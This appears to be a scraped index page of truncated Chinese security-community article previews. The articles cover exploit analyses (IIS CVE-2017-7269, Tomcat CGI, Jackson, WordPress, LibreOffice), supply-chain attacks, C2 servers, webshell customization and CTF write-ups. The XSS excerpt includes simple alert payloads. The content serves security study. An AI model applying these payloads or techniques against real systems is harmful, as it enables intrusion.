##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
资产管理,虽然是安全工作的基础,但是一直以来很多人不屑于做这些基础工作,因为资产管理不是高大上且见效快的工作,是累活苦活远不如挖个洞或发现黑客攻击有成就感。笔者认为,特别是大型互联网企业基于安全需求和存在的问题,搭建安全资产平台,能够为监控、应急响应及数据泄露溯源等提供资产定位,能够快速定位被攻击、渗透的对象或泄露源并止损,将大幅提升安全运营效率。与此同时,通过对资产的进一步挖掘和分析更能为确定安全工作优先级及投入产出比(ROI)提供决策支撑。
## 安全资产管理的重要性
安全资产是安全运营的必备基础能... | 社区文章 |
## **漏洞描述:**
3月27日,在Windows 2003 R2上使用IIS 6.0
爆出了0Day漏洞(CVE-2017-7269),漏洞利用PoC开始流传,但糟糕的是这产品已经停止更新了。网上流传的poc下载链接如下。
github地址:<https://github.com/edwardz246003/IIS_exploit>
结合上面的POC,我们对漏洞的成因及利用过程进行了详细的分析。在分析过程中,对poc的exploit利用技巧感到惊叹,多次使用同一个漏洞函数触发,而同一个漏洞同一段漏洞利用代码却实现不同的目的,最终通过ROP方式绕过GS的保护,执行shellcode。
## **调试环境** :
虚拟机中安装Wi... | 社区文章 |
### 前言
BLE的应用范围越来越广,特别是在移动智能设备上。现在低功耗蓝牙(BLE)连接都是建立在 GATT (Generic Attribute Profile)
协议之上。GATT 是一个在蓝牙连接之上的发送和接收很短的数据段的通用规范,这些很短的数据段被称为属性(Attribute)。
GATT负责两个BLE设备间通信的数据交互,是对功能数据最为重要的部分,GATT包括三层:
PROFILE、CHARACTERISTIC、SERVICE
CHARACTERISTIC是每个功能的对象,每个Servie都包含一个或多个CHARACTERISTIC,而PROFILE是他们的大类集合。(如图)
[
### example:... | 社区文章 |
# Linux容器安全:通过`/proc/pid/root`目录来实现权限提升
|
##### 译文声明
本文是翻译文章,文章原作者 labs.f-secure,文章来源:labs.f-secure.com
原文地址:<https://labs.f-secure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/>
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
容器是指一个与主机系统相隔离的工作区域,本质是一种特殊的进程。在Linux操作系统中运行相关容器时(例如Docker与LXC),会使用到多个Linux命名空间来隔离资源以实现虚拟... | 社区文章 |
## 前言
休假在家,竟然早上6点自然醒,不如做点数学题?
于是心血来潮打开
https://hackme.inndy.tw/scoreboard/
既然刷完了web,今天也尽量把crypto也刷完XD
做的过程中发现网上很难搜到题解,于是有了这篇文章
注:web全题解
http://skysec.top/2018/01/07/hackme%E7%BD%91%E7%AB%99%E8%BE%B9%E5%81%9A%E8%BE%B9%E8%AE%B0%E5%BD%95/
https://www.anquanke.com/post/id/156377
## easy
题目给了一串16进制
526... | 社区文章 |
# 不规范的依赖管理:我如何入侵苹果,微软和数十家公司(新型供应链攻击的故事)
自从我开始学习如何编程,我一直对执行如下一条简单命令的信任程度所吸引。
pip install package_name
某些编程语言,如Python,附带一种简单,接近官方的方法用于为项目安装依赖项。这些安装程序通常与公开代码存储库绑定,在哪里任何人都可以自由上传代码包供他人使用。
你可能已经听说过这些工具-比如Node有`npm`和npm注册表,Python的`pip`使用PyPI(Python包索引),和Ruby的gem可以在RubyGems找到。
当下载和使用来自任何资源的包,你基本是信任它的发行者在你的机器上运行代码的。那么这种盲目的信... | 社区文章 |
# 以CVE-2020-8840为例分析Jackson漏洞
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x00 前言
前面讲了FastJson的相关漏洞,温少属实辛苦。这次来看下另一种JSON解析库:“世界上最好的JSON解析库—Jackson”,并以CVE-2020-8840来详细分析下Jackson的漏洞。
## 0x01 Jackson的介绍和使用
FastJson将思路全都集中到“速度快”上去,而偏离了“标准”及功能性,质量也不够好,有点“舍本逐末”的味道。而Jackson不仅开源稳定易使用,而且拥有Spring生态加持,更受使用者的青睐。
目前Jackson主要有两个分支:... | 社区文章 |
**作者:Lyle**
**来源:<https://xz.aliyun.com/t/4875>**
**本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送!
投稿邮箱:paper@seebug.org**
## 简述
### 利用前提
该漏洞是由于Tomcat CGI将命令行参数传递给Windows程序的方式存在错误,使得CGIServlet被命令注入影响。
该漏洞只影响Windows平台,要求启用了CGIServlet和enableCmdLineArguments参数。但是CGIServlet和enableCmdLineArguments参数默认情况下都不启用。
### 时间线
* 报... | 社区文章 |
# 安珀实验室千里追踪75万台“肉鸡”控制源
##### 译文声明
本文是翻译文章,文章来源:www.donews.com
原文地址:[www.donews.com/news/detail/4/2991825.html](www.donews.com/news/detail/4/2991825.html)
译文仅供参考,具体内容表达以及含义原文为准。
从2017年中“永恒之蓝”勒索病毒席卷全球,到2018年初的“英特尔CPU漏洞事件”大爆发,近年来,随着网络技术水平的不断提升,以“云物移大智”等为代表的新兴技术得到广泛应用,新产业新模式层出不穷,带来了全新的商业化图景,但随之而来的日益严重的信息安全问题,也让人们对网络安全愈发关注与... | 社区文章 |
最近打了几个国外的ctf,发现对于xss的考点还是很多,这里整理一下也当做我的笔记
## 热身小游戏
这里拿google xss game的一个在线平台做实验
<https://xss-game.appspot.com/level1>
level1没有任何限制
<script>alert(1)</script>
标准的`<script>`弹窗
Level2
在`<script>`标签无法触发的时候
你要想到另一个标记来触发javascript
比如
经典的img标记和onerror属性
`<img src="x" onerror="javascript:alert(1)"/>`
成功载入触发
Level3
toggl... | 社区文章 |
# 如何利用Docker构建命令控制服务器
##### 译文声明
本文是翻译文章,文章原作者 Alexander Rymdeko-Harvey,文章来源:obscuritylabs.com
原文地址:<https://blog.obscuritylabs.com/docker-command-controll-c2/>
译文仅供参考,具体内容表达以及含义原文为准。
## 一、前言
在红蓝对抗中,红方成功突破对手防线是再正常不过的一件事情。许多经验证明(根据我的团队工作经验),如果想不断扩大规模、紧跟经验丰富的安全运营中心(security
operations
center,SOC)的发展步伐,那就必须紧抓自动化处理流程这个关键因... | 社区文章 |
## 写在前面
最近深感自己前端安全知识掌握的不是很好,于是找了个[XSS靶场](https://alf.nu/alert1)练习下,截止到2019年6月9日,网站上共有29道题目,我当前只做出了26道,还有3道题目没有头绪,分别是`Fruit
3`、`Quine`、`Entities 2`,当然已经做出的这些题目也不一定是最优解,希望与师傅们交流学习下,如果有发现什么错误,欢迎师傅们批评指正。
我的链接
https://alf.nu/alert(1)#accesstoken=WcMW1j+qtfFu6BQVFdJM
浏览器版本:`Chrome 74`
## 1\. Warmup
### 1.1 源码
functio... | 社区文章 |
**作者:道明君**
**公众号:<https://mp.weixin.qq.com/s/2_-dXLwkC3slFYV4lBsp2w>**
## 一、前言
近日朋友收到一封来自海外的钓鱼邮件,委托我帮忙分析。因此我对钓鱼者身份和攻击路径进行了一次详细的溯源。大致摸清了攻击者组织身份、攻击手法以及动机。本次溯源工作主要是通过提取攻击者控制的肉鸡服务器、网站访问日志、攻击者后门特征等。关联分析这些日志和特征最终得到攻击者的身份信息。本文以流水账的方式,详细记录整个溯源过程,包括分析手法和思路,以供安全研究人员参考。
## 二、信息收集
这是一封冒充 Microsoft Outlook WebApp 密码过期的钓鱼邮件:
### 2... | 社区文章 |
# WordPress 5.0.0远程代码执行漏洞分析
|
##### 译文声明
本文是翻译文章,文章原作者 ripstech,文章来源:blog.ripstech.com
原文地址:<https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/>
译文仅供参考,具体内容表达以及含义原文为准。
## 一、概要
本文详细介绍了如何通过路径遍历及本地文件包含(LFI)漏洞,在WordPress中实现远程代码执行(RCE)。该漏洞在WordPress中已存在6年之久。攻击视频参考[此处](https://blog.ripstech.com/videos/word... | 社区文章 |
## Libreoffice 远程代码执行漏洞(CVE-2018-16858) 分析
翻译文章:<https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html>
近期,我开始研究 Libreoffice, 刚刚发现了一个远程执行漏洞。用户只需要打开恶意的 ODT
文件,并且将鼠标移到文件上,就可以在不弹出任何警告的前提下触发漏洞。
这篇博客将会详细介绍我发现的这个漏洞。虽然这个漏洞是在 Windows 中演示的,但是仍然可以在 Linux 中使用。
LibrOffice 版本:6.1.2.1
操作系统:Window... | 社区文章 |
# 比特币底层漏洞:大多数正义与信道安全
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
几乎所有关于加密货币和区块链的讨论都源于中本聪的白皮书:《比特币:一种点对点的电子现金系统》Bitcoin: A Peer-to-Peer
Electronic Cash System (Satoshi Nakamoto)。
2008 年11月1日,一个密码学邮件组收到了 [satoshi@vistomail.com](mailto:satoshi@vistomail.com)
邮箱发出的这份白皮书,2009年1月3日,中本聪的个人电脑里挖出了50个比特币,并在创世区块里留下一句永不可修改的话:
`“The ... | 社区文章 |
**作者: Evi1hui@ QAX A-TEAM
原文链接:<https://mp.weixin.qq.com/s/dp_I-MyAXdLm4IR2Y2PqEQ>**
Apache Dubbo是一个分布式框架,致力于提供高性能透明化的RPC远程服务调用方案,以及SOA服务治理方案。Apache
Dubbo在实际应用场景中主要负责解决分布式的相关需求。
Apache Dubbo支持多种协议,官方推荐使用 Dubbo 协议,CVE-2019-17564是属于Apache Dubbo
HTTP协议中的一个反序列化漏洞,该漏洞的主要原因在于当Apache Dubbo启用HTTP协议之后,Apache
Dubbo在接受来自消费者的远程调... | 社区文章 |
## 前言
本人有意写一份系列文章,主要内容是分享蚁剑改造过程中的一些技巧与经验。
因为蚁剑的相关文档实在比较少,可能很多同学都像自己当初一样想要二次开发可是不知如何下手。
不敢贸然称之为教程,只是把改造的过程发出来供大家借鉴,希望其他同学能够少走弯路。
* [蚁剑改造计划之实现动态秘钥编码器解码器](https://xz.aliyun.com/t/6571)
* [蚁剑改造计划之基于随机Cookie的动态秘钥编码器](https://xz.aliyun.com/t/6917)
* [蚁剑改造计划之增加垃圾数据](https://xz.aliyun.com/t/7126)
## 正文
### 历史遗留问题
我在前面几篇文... | 社区文章 |
# 【技术分享】跟我入坑PWN第一章
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
****
作者:[WeaponX](http://bobao.360.cn/member/contribute?uid=2803578480)
预估稿费:300RMB(不服你也来投稿啊!)
投稿方式:发送邮件至[linwei#360.cn](mailto:linwei@360.cn),或登陆[网页版](http://bobao.360.cn/contribute/index)在线投稿
**
**
**传送门**
* * *
[**【技术分享】跟我入坑PWN第二章** ****](http:... | 社区文章 |
**Author:dawu(知道创宇404实验室)**
**date: 2016-11-16**
## 0x00 漏洞概述
### 1.漏洞简介
Sparkjava是一款小型的web框架,它能够让你以很少的代码构建出一个java
web应用。近日,某国外安全研究人员发现其存在文件遍历漏洞,可以通过该漏洞读取任意文件内容。在对这个漏洞进行复现与分析的时候,我们又发现了一些可能可以利用的地方,但是利用条件更加苛刻。
### 2.漏洞影响
Sparkjava版本 < 2.5.2
## 0x01 漏洞复现
### 1.验证环境
Jdk-1.8.0_111 Apache maven 3.3.9 在写好Sparkjava代码后,在文件所在目录打... | 社区文章 |
## 前言
腾讯云鼎实验室主办的`2020Geekpwn`比赛在`7.12.22:00`结束,我们队伍最终获得第五名的成绩,这个比赛难度相对比较大且压力主要在队伍的`pwner`身上,可以说是`pwner`的盛宴。
比赛设有四道难度比较高`G-escape`题目,也就是四道逃逸类型的题目,`childshell`,`Vimu`,`Easykernelvm`,`Kimu`,最终解出数分别为`6`,`2`,`1`,`0`,我在比赛中有幸第一个解出了`Vimu`,肝了小一天半,最后能解出还是很开心的,在这里记录一下解题过程。这道题其实说难也有难度,做完再回头看的话,说简单也简单,这个每个人感觉可能都不同,此外我本人接触`Qemu-Esca... | 社区文章 |
### 前言
代码审计,最重要的就是多读代码,对用户与网站交互的地方要特别注意。在进行审计时,我们也可以使用一些审计工具来辅助我们进行工作,从而提高效率。下面,笔者将分享审计zzcms8.2的过程,与大家一起学习。这里,笔者使用
**seay源代码审计系统** 软件进行辅助工作。
### 审计流程
首先,笔者打开 **seay源代码审计系统**
软件,将要审计的网站源码导入项目,然后点击自动审计。当审计完成时,我们需要根据自动审计的结果,进行逐一验证。当然,我们不需要真的每个文件都打开看过去,可以根据扫描报告中的漏洞详细信息来判断是否可能存在漏洞,如果你觉的某个地方可能存在,这时,你再打开具体文件查看。
如果你想查询某个变量或者函数... | 社区文章 |
作者:隐形人真忙
作者博客:<http://blog.csdn.net/u011721501/article/details/79450122>
#### 0x00 前言
最近关注了一下区块链方面的安全,因此翻出来之前的DAO攻击事件研究了一番,形成此文。
之后可能还会发一些其他的安全分析文章。
#### 0x00 基础知识
##### 1.跨合约调用
智能合约之间的调用本质上是外部调用,可以使用message call或者创建智能合约对象的形式进行调用。
(1)使用message call
比如合约1调用合约2的某个方法:
bytes4 methodId = bytes4(keccak256("increaseAge(... | 社区文章 |
**作者:宽字节安全**
**原文链接:<https://mp.weixin.qq.com/s/gYGrdDtIldzrE7NHSxTDYQ>**
**本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送!**
**投稿邮箱:paper@seebug.org**
前几篇文章主要介绍了在tomcat,weblogic下如何通过动态注册一个Filter的方式,去实现无文件落地的webshell。当然在J2EE中,我们也可以动态注册一个Servlet去实现无文件落地的webshell。
**以下分析基于tomcat6,其他版本的Tomcat的思路类似**
## 0x00 servlet简介
### 1\... | 社区文章 |
开学了课多了也是比较忙,花了好久才完成
狂雨cms是款小说cms,照例先是网站介绍
#### 网站介绍
狂雨小说内容管理系统(以下简称KYXSCMS)提供一个轻量级小说网站解决方案,基于ThinkPHP5.1+MySQL的技术开发。
KYXSCMS,灵活,方便,人性化设计简单易用是最大的特色,是快速架设小说类网站首选,只需5分钟即可建立一个海量小说的行业网站,批量采集目标网站数据或使用数据联盟,即可自动采集获取大量数据。内置标签模版,即使不懂代码的前端开发者也可以快速建立一个漂亮的小说网站。
#### 建站
手动创建数据库,这里库名为kycms
填好信息进行安装
安装完成,直接进入后台
admin admin
###... | 社区文章 |
### 0x01 前言
验证码的定义:
> 验证码(CAPTCHA)是“Completely Automated Public Turing test to tell Computers and
> Humans
> Apart”(全自动区分计算机和人类的图灵测试)的缩写,是一种区分用户是计算机还是人的公共全自动程序。可以防止:恶意破解密码、刷票、论坛灌水,有效防止某个黑客对某一个特定注册用户用特定程序暴力破解方式进行不断的登陆尝试,实际上用验证码是现在很多网站通行的方式,我们利用比较简易的方式实现了这个功能。这个问题可以由计算机生成并评判,但是必须只有人类才能解答。由于计算机无法解答CAPTCHA的问题,所以回答出问题的用户就可以... | 社区文章 |
# 某网游刷坐骑、刷极品道具、刷经验漏洞实现分享
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
一款老网游,找传奇类网游偶遇分析之做个小测试,
**作为豹子头玩家找到相关漏洞注册几个新号试刷一下封存,半年后于21年4月复试发现漏洞依旧存在,提交官方现已修复** 。本次主要介绍3个漏洞:
**刷坐骑**
无限免费的各种坐骑,坐骑可分解可进阶,也就是无限的顶阶坐骑
**刷极品道具**
无限免费的强化石、锁星石、炼魔石等,高玩几十万做的装备套装可以基本不花钱做出来
**刷经验**
可迅速升级到全服第一,一年内的服1小时内搞定,几年的老服也就几小时的事
活动期间附带兑换币奖励,可以大量... | 社区文章 |
# HTTP/2降级走私攻击
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
一直关注的Black Hat USA 2021议题HTTP/2: The Sequel is Always
Worse,最近终于看到相关文档,这里记录下学习到的内容。
## 关于HTTP/2
HTTP/2标准于2015年5月以RFC
7540正式发表,基于SPDY协议。根据[W3Techs](https://w3techs.com/)的数据,截至2021年7月,全球有46.0%的网站支持了HTTP/2。
### 新特性
HTTP/2协议相对于HTTP/1.1在性能上有了很大的提升,主要具有以下新特性
1. 二进制... | 社区文章 |
# Zigator:分析Zigbee智能家居的安全性
|
##### 译文声明
本文是翻译文章,文章原作者 Dimitrios-Georgios Akestoridis,Madhumitha Harishankar,Michael
Weber,Patrick Tague,文章来源:wisec2020.ins.jku.at
原文地址:<https://wisec2020.ins.jku.at/proceedings/wisec20-153.pdf>
译文仅供参考,具体内容表达以及含义原文为准。
随着用于住宅的互联网连接设备的普及,重要的是要确保它们满足适当的安全目标,因为它们通过传感器和执行器与物理世界进行交互。
Zigbee是一种无... | 社区文章 |
> 大体思路:request 到达 Controller 层时会经过 Interceptor
> (拦截器),所以我们可以自定义一个恶意拦截器,并将其注入正在运行的Spring应用。使得 request 经过我们的恶意拦截器时触发恶意代码执行命令。
>
>
> 测试环境:
> java version 1.8.0_221
> Spring Boot 2.5.1
### 一、拦截器的使用
* * *
#### 1.1 拦截器的实现
可以通过继承 HandlerInterceptorAdapter 类并覆盖其 preHandle
方法实现拦截。preHandle是请求执行前执行,preHandle 方法中写一些拦截... | 社区文章 |
# 【技术分享】侧信道攻击,从喊666到入门之——差分能量攻击初探
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
作者:[backahasten](http://bobao.360.cn/member/contribute?uid=245645961)
稿费:350RMB
投稿方式:发送邮件至linwei#360.cn,或登陆[网页版](http://bobao.360.cn/contribute/index)在线投稿
**前言**
最近在做老师留的翻译作业的时候。发现了很多有关于侧信道攻击的文章。目前, **在国内的安全圈子中很少看到与侧信道有关的内容,希望这篇可以做一个补... | 社区文章 |
# 【安全报告】McAfee Labs 威胁报告 2017.06 (下)
|
##### 译文声明
本文是翻译文章,文章来源:mcafee.com
原文地址:<https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf>
译文仅供参考,具体内容表达以及含义原文为准。
****
译者:[ureallyloveme](http://bobao.360.cn/member/contribute?uid=2586341479)
预估稿费:200RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
传送门
[【安全报告】Mc... | 社区文章 |
# 《书安》第三期
|
##### 译文声明
本文是翻译文章,文章来源:ijiandao
原文地址:<http://down.jdsec.com/secbook-3/%E4%B9%A6%E5%AE%89-%E7%AC%AC%E4%B8%89%E6%9C%9F.pdf>
译文仅供参考,具体内容表达以及含义原文为准。
**《书安》第三期在小伙伴的努力下又发布啦!第三期《书安》从 **joomla** 注入到vbulletin注入,从SDK-wormhole漏洞到Redis未授权访问导致服务器被黑等一些列漏洞,进行漏洞分析,漏洞利用,可用POC,实际案例等全方位概括,有攻有防,欢迎大家下载阅览**
[**下载地址:**](http://d... | 社区文章 |
bytectf 2019 re 驱动逆向 DancingKeys WP
# 比赛地址
[https://adworld.xctf.org.cn/match/contest_challenge?event=101&hash=b1c22799-e6cf-4892-937d-c189605f5b5f.event](https://adworld.xctf.org.cn/match/contest_challenge?event=101&hash=b1c22799-e6cf-4892-937d-c189605f5b5f.event)
# 简介
本题是一个windows键盘过滤驱动程序的逆向,可以参考<https://blog.csdn.ne... | 社区文章 |
## 前言
由于漏洞并未公布在互联网上,所以具体是哪个厂家的光猫就不说明了,文中是可以找到的,并未打码,感兴趣的朋友可以自己找找看。
拿到光猫固件,大概看了下,用的是CGI+SH的编程方式,并且源代码都没有做权限的验证,相关代码也没有加密,所以分析也就简单了许多。
下面我们来看下漏洞详情
### 远程命令执行
漏洞在文件telnet.cgi文件中,首先文件判断是否为POST发包,如果是就进行处理
if [ "$REQUEST_METHOD" == "POST" ];then
settelnet
else
gettelnet
fi
我们跟进settelnet这个函数,进入函数后,看到... | 社区文章 |
# 再说VS竞技游戏平台的那些事
|
##### 译文声明
本文是翻译文章,文章来源:360安全播报
译文仅供参考,具体内容表达以及含义原文为准。
你或许还记得我们今年9月份时发的这篇博客:《[VS竞技游戏平台刷流量木马说明](http://blogs.360.cn/360safe/2015/09/24/about_flow_trojan_in_vs_game_platform/)》,惊闻VS竞技游戏平台的母公司“广州唯思软件股份有限公司”最近挂牌上市了。
[](http://blogs.360.cn/360safe/files/2015/12/01%E4%B8%8A%E5%B8%82.png)
照理说公司挂牌上市了,意味着要面... | 社区文章 |
# justCTF[*]2020 RE部分复盘
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
最近复盘了一下`justCTF[*]2020`,分享一下我的收获
官网 <https://2020.justctf.team/>
## rusty
> Looking at Rust code in disassembler/decompiler hurts, so… look somewhere
> else.
看到这个标题,打消了直接分析反汇编代码的念头,我有如下思路
* 像Ruby打包exe工具ocra一样,exe文件包含了源代码脚本和脚本解析工具ruby.exe,但是ru... | 社区文章 |
# 【技术分享】看我如何挖到GoogleMaps XSS漏洞并获得5000刀赏金
|
##### 译文声明
本文是翻译文章,文章来源:medium.com/@marin_m
原文地址:<https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff>
译文仅供参考,具体内容表达以及含义原文为准。
****
翻译:[testvul_001](http://bobao.360.cn/member/contribute?uid=780092473)
预估稿费:200RMB
投稿方式:发送邮件至[li... | 社区文章 |
# GraphQL安全指北
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
联名作者:gyyyy & 图南
>
> 今年先知大会上p牛分享了一些关于GraphQL安全的内容,我正好有使用GraphQL,于是想写一些我对GraphQL安全的一些理解和看法,和好基友`[@gyyyy](https://github.com/gyyyy
> "@gyyyy")` 说了这个想法之后一拍即合,于是联手写了这篇文。我俩水平有限,不足之处请批评指正。
## 说在前面的话
本文以GraphQL中一些容易让初学者与典型Web API _(为了便于理解,下文以目前流行的RESTful API为例代指)_
混淆或错误理解... | 社区文章 |
# 【知识】11月21日 - 每日安全知识热点
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**热点概要:永无终日的恶意软件——银行木马卷土重回Play Store、 ** ** ** **针对Wordpress的wp-vcd新攻击出现******** 、世界知名网站中超过400个在记录你全部的键击过程、CVE-2017-16544 Busybox自动完成漏洞、 **
**CVE-2017-11882 POC** 、 **Intel安全补丁更新、 **TLS重定向攻击、针对新的IoT DDoS恶意软件的分析******
。**
**资讯类:**
永无终日的恶意软件——银行... | 社区文章 |
### 2017-10-18 本次现场众测活动圆满结束,共有30名左右白帽子参加!
### 活动期间,白帽子们都在认认真真的测试,很注重测试细节,也取得了不错的结果。
### 感谢大家,奖金这几天就会发出。
* * *
### 2017-10-17
#### 一血漏洞 额外奖金 2000 已在早上10:02分被 黑色键盘拿走,恭喜!
#### 核心高危一血漏洞在 15:16 分钟,额外奖金5000 被 Gmt 拿走,恭喜!
* * *
##### 测试时间: 11.17-11.18(和大会时间同步 9:30-17:00)
##### 众测场地: 先知创新大会—北京粤财JW万豪酒店(现场有网络)
##### 测试范围: 测试当天公布
... | 社区文章 |
# 文章简介
这篇文章使用红日渗透靶场(一)来进行练习对内网不出网机器的渗透,在这里感谢师傅们提供了现成的靶场环境,供我们小白来进行学习和练习。这个靶场设计的比较简单,但是通过这个靶场环境,采用多种手段进行渗透,可以使自己在没有那么多授权的真实环境条件下,通过靶场提高自己的技术。
## 配置网络
在VM虚拟机中按照下边的网络拓扑进行配置网络。网络拓扑图如下:
win7具有双网卡,其中外网ip是192.168.8.133,内网网段是52。三台机器彼此互通,但是win server
2008和win2003不通外网。用我mac作为攻击机,来对这个靶场环境进行渗透测试。
## 外网打点
在win7这台靶机上,使用PHPStudy让网站... | 社区文章 |
# 探索DOM XSS一个trick的原理
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
前段时间P牛在他的星球发了一个XSS的小挑战(关于挑战的更多细节和解法见P牛的[博客](https://www.leavesongs.com)或者星球),我用的是DOM
clobbering的方式完成。事后P牛给出了另一个trick,我看不懂但大受震撼,所以本文就来探讨一下这个trick的原理。
以下测试的步骤都是Win10 & Chrome 最新版(92.0.4515.131) 下进行的;作者水平有限,如有错漏,还请各位师傅指正。
## 挑战
小挑战的代码如下
<script>
co... | 社区文章 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.